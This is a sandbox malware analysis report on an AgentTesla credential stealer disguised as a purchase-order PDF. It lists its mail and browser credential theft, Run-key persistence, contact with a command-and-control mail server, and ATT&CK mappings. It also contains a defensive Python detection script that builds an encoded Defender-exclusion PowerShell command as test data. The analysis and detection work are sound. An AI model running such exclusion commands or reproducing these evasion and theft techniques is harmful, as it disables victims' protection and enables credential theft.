Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2544912217.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2545517189.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1548552550.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7348, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 8020, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 13.2.ctsdvwT.exe.409f328.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43f9d68.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.40d9f48.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43bf148.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43f9d68.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.40d9f48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3bcd820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.ctsdvwT.exe.43bf148.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 13.2.ctsdvwT.exe.409f328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3b92c00.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe PID: 7192, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7644, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7752, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: ctsdvwT.exe PID: 7952, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic column; a bracketed figure is the count badge the report shows beside a technique matched by its signatures):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: [121] Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: [1] DLL Side-Loading; [1] Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: [1] DLL Side-Loading; [112] Process Injection; [1] Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: [11] Disable or Modify Tools; [1] Deobfuscate/Decode Files or Information; [3] Obfuscated Files or Information; [12] Software Packing; [1] Timestomp; [1] DLL Side-Loading; [1] Masquerading; [141] Virtualization/Sandbox Evasion; [112] Process Injection; [1] Hidden Files and Directories
Credential Access: [1] OS Credential Dumping; [21] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: [1] File and Directory Discovery; [24] System Information Discovery; [211] Security Software Discovery; [2] Process Discovery; [141] Virtualization/Sandbox Evasion; [1] Application Window Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: [11] Archive Collected Data; [1] Data from Local System; [1] Email Collection; [21] Input Capture; [1] Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: [1] Encrypted Channel; [1] Non-Standard Port; [1] Non-Application Layer Protocol; [11] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph (ID 1446058; sample: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe; start date 22/05/2024; architecture: WINDOWS; score: 100)

Contacted host: mail.saralgumruk.com

Signatures on the sample: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 10 other signatures

Process tree:
  baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
    signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
    > baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe (second instance)
        network: mail.saralgumruk.com 185.81.155.88, ports 587, 59154, RADORETR, Turkey
        dropped: C:\Users\user\AppData\Roaming\...\ctsdvwT.exe (PE32); C:\Users\user\...\ctsdvwT.exe:Zone.Identifier (ASCII)
        signatures: Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
    > powershell.exe
        signatures: Loading BitLocker PowerShell Module
        > conhost.exe
  ctsdvwT.exe
    signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file
    > ctsdvwT.exe
  ctsdvwT.exe
    > ctsdvwT.exe
        signatures: Tries to harvest and steal browser information (history, passwords, etc)

Antivirus detection (sample)
Source                                                          Detection  Scanner         Label
baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe    37%      ReversingLabs   ByteCode-MSIL.Trojan.AgentTesla
baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe   100%      Joe Sandbox ML

Antivirus detection (dropped files)
Source                                              Detection  Scanner         Label
C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe    100%      Joe Sandbox ML
C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe     37%      ReversingLabs   ByteCode-MSIL.Trojan.AgentTesla

No Antivirus matches
No Antivirus matches

Antivirus detection (URLs)
Source                                                       Detection  Scanner          Label
https://account.dyn.com/                                       0%       URL Reputation   safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name     0%       URL Reputation   safe
http://mail.saralgumruk.com                                    0%       Avira URL Cloud  safe
Contacted domains
Name                   IP              Active  Malicious  Antivirus Detection  Reputation
mail.saralgumruk.com   185.81.155.88   true    true                            unknown
Contacted URLs
Name: https://account.dyn.com/
  Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.00000000044B1000.00000004.00000800.00020000.00000000.sdmp; baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1325496333.0000000003B92000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.1486766690.00000000043BF000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000C.00000002.1545932299.0000000000402000.00000040.00000400.00020000.00000000.sdmp; ctsdvwT.exe, 0000000D.00000002.1575415406.000000000409F000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown
Name: http://mail.saralgumruk.com
  Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000009.00000002.2545517189.0000000002D39000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: Avira URL Cloud: safe
  Reputation: unknown
Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
  Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe, 00000005.00000002.1320959148.00000000028D2000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000A.00000002.1485685529.0000000003102000.00000004.00000800.00020000.00000000.sdmp; ctsdvwT.exe, 0000000D.00000002.1568438809.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false
  Antivirus Detection: URL Reputation: safe
  Reputation: unknown
Contacted IPs
IP              Domain                 Country  ASN    ASN Name   Malicious
185.81.155.88   mail.saralgumruk.com   Turkey   42926  RADORETR   true
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1446058
                      Start date and time:2024-05-22 22:03:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 47s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                      renamed because original name is a hash value
                      Original Sample Name:baymarhavuzculuk Satnalma Siparii 20230331,pdf.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@12/9@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 267
                      • Number of non-executed functions: 8
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 2.19.126.137, 2.19.126.163
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
• Not all processes were analyzed; the report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • VT rate limit hit for: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
Time      Type             Description
16:03:55  API Interceptor  1785358x Sleep call for process: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe modified
16:03:57  API Interceptor  8x Sleep call for process: powershell.exe modified
16:04:12  API Interceptor  405029x Sleep call for process: ctsdvwT.exe modified
21:04:02  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
21:04:10  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctsdvwT C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
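The behaviours the report records for this sample (a Defender exclusion added through an encoded PowerShell command, a Run-key value pointing into AppData\Roaming, a Zone.Identifier stream rewritten to ZoneId=0 on the dropped copy, and SMTP submission to mail.saralgumruk.com on port 587) map directly onto host-telemetry detections. The following is an added example, not code from the report or from Joe Sandbox: it turns those observations into rules and runs them over constructed Sysmon-style events modelled on the process tree above. The event schema, the PowerShell command text (the report names only the Sigma rule, not the literal command line), the mail-client allow-list, and the hash comparison against the sample's SHA-256 (the dropped ctsdvwT.exe carries the same hash) are all assumptions made for the example.

```python
import base64
import re

# Indicators taken from this report (analysis ID 1446058).
C2_IP = "185.81.155.88"
C2_DOMAIN = "mail.saralgumruk.com"
C2_PORT = 587
SAMPLE_SHA256 = "b5e9a3a112c889e9afaa48926ed0bf9474fb430cc99dff8915192877f58d5efe"
RUN_KEY_RE = re.compile(r"^HKCU(?:64)?\\Software\\Microsoft\\Windows\\CurrentVersion\\Run$", re.I)
ENCODED_CMD_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
MAIL_CLIENTS = ("outlook.exe", "thunderbird.exe")  # assumed allow-list for port 587


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument (base64 of
    UTF-16LE), or None when the command line carries none or it does not decode."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_event(ev):
    """Apply the report's behaviours as rules to one event; return the rule names that fire."""
    hits = []
    kind = ev["type"]
    if kind == "process" and ev["image"].lower().endswith("powershell.exe"):
        # "Powershell Base64 Encoded MpPreference Cmdlet": inspect the decoded
        # payload, not only the visible command line.
        text = decode_encoded_command(ev["cmdline"]) or ev["cmdline"]
        if re.search(r"\b(Add|Set)-MpPreference\b", text, re.I) and \
                re.search(r"-Exclusion(Path|Process|Extension)", text, re.I):
            hits.append("defender_exclusion_via_powershell")
    elif kind == "registry":
        # "Autostart Run": a Run-key value that points into the user's AppData\Roaming.
        if RUN_KEY_RE.match(ev["key"]) and "\\appdata\\roaming\\" in ev["value"].lower():
            hits.append("run_key_persistence_from_appdata")
    elif kind == "file":
        # "Hides that the sample has been downloaded from the Internet":
        # a Zone.Identifier stream set to ZoneId=0 (Local Machine) instead of 3 (Internet).
        if ev["path"].lower().endswith(":zone.identifier") and \
                re.search(r"^ZoneId=0\s*$", ev.get("content", ""), re.M):
            hits.append("motw_zone_reset_to_local")
        if ev.get("sha256", "").lower() == SAMPLE_SHA256:
            hits.append("known_agenttesla_sample_hash")
    elif kind == "network":
        if ev.get("dst_ip") == C2_IP or ev.get("dst_host", "").lower() == C2_DOMAIN:
            hits.append("contact_with_reported_c2")
        # "Detected TCP or UDP traffic on non-standard ports": 587 from a non-mail process.
        if ev.get("dst_port") == C2_PORT and not ev["image"].lower().endswith(MAIL_CLIENTS):
            hits.append("smtp_submission_from_non_mail_client")
    return hits


def scan(events):
    """Map event index -> fired rules, skipping events that match nothing."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}


# Constructed telemetry modelled on the report's process tree (not captured data).
# The PowerShell command text is an assumption for the example.
ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\ctsdvwT'".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -EncodedCommand {ENCODED}"},
    {"type": "registry", "key": r"HKCU64\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "ctsdvwT", "value": r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe:Zone.Identifier",
     "content": "[ZoneTransfer]\r\nZoneId=0\r\n"},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe", "sha256": SAMPLE_SHA256},
    {"type": "network", "image": r"C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe",
     "dst_ip": "185.81.155.88", "dst_host": "mail.saralgumruk.com", "dst_port": 587},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},  # benign control
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["type"], ", ".join(rules))
```

The encoded-command rule is the one worth keeping even if the IOC-specific rules age out: hash and C2 indicators change per campaign, while "Add-MpPreference -ExclusionPath hidden behind -EncodedCommand" is a behaviour, and the decode step is what keeps a plain substring match on the command line from missing it.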
Context for IP 185.81.155.88 (other samples seen by Joe Sandbox contacting this IP)
Associated Sample Name                                                              Detection  Threat Name
PROFAYDINLATMA YEN#U0130 S#U0130PAR#U0130#U015e YILDIRIM MEKANIK RFQ 2701203.exe     malicious  AgentTesla
YILDIZ A.s siparis000867_000960 Hizmet Teklif Talebi.exe                            malicious  AgentTesla
KALENDA Fiyat ve Termin Talebi Hk... 025162 (1).exe                                 malicious  AgentTesla, PureLog Stealer
Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024.exe             malicious  AgentTesla, PureLog Stealer

Context for domain mail.saralgumruk.com
Associated Sample Name                                                              Detection  Threat Name                   Resolved IP
PROFAYDINLATMA YEN#U0130 S#U0130PAR#U0130#U015e YILDIRIM MEKANIK RFQ 2701203.exe     malicious  AgentTesla                    185.81.155.88
YILDIZ A.s siparis000867_000960 Hizmet Teklif Talebi.exe                            malicious  AgentTesla                    185.81.155.88
KALENDA Fiyat ve Termin Talebi Hk... 025162 (1).exe                                 malicious  AgentTesla, PureLog Stealer   185.81.155.88
Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024.exe             malicious  AgentTesla, PureLog Stealer   185.81.155.88

Context for ASN RADORETR
Associated Sample Name                                                              Detection  Threat Name                   IP
sDcscN5fmS.exe                                                                      malicious  FormBook                      89.252.183.67
PURCHASE ORDER.doc                                                                  malicious  FormBook                      89.252.183.67
PROFAYDINLATMA YEN#U0130 S#U0130PAR#U0130#U015e YILDIRIM MEKANIK RFQ 2701203.exe     malicious  AgentTesla                    185.81.155.88
YILDIZ A.s siparis000867_000960 Hizmet Teklif Talebi.exe                            malicious  AgentTesla                    185.81.155.88
KALENDA Fiyat ve Termin Talebi Hk... 025162 (1).exe                                 malicious  AgentTesla, PureLog Stealer   185.81.155.88
G7DzDN2VcB.exe                                                                      malicious  FormBook                      89.252.183.67
Siparis. #PO000867000960 AZTEK Order _ BIRLESIM NEKS A.s 14.05.2024.exe             malicious  AgentTesla, PureLog Stealer   185.81.155.88
TS-240514-UF2.exe                                                                   malicious  FormBook, PureLog Stealer     89.252.183.67
z8s945rPmZ.exe                                                                      malicious  SystemBC                      185.210.92.160
Fiyat teklifi Istegi 23070 PER 72 Adet #U2026scanneed 00101 xlsx.exe                malicious  AgentTesla, PureLog Stealer   185.123.54.147
                              No context
                              No context
                              Process:C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1172
                              Entropy (8bit):5.3550249375369265
                              Encrypted:false
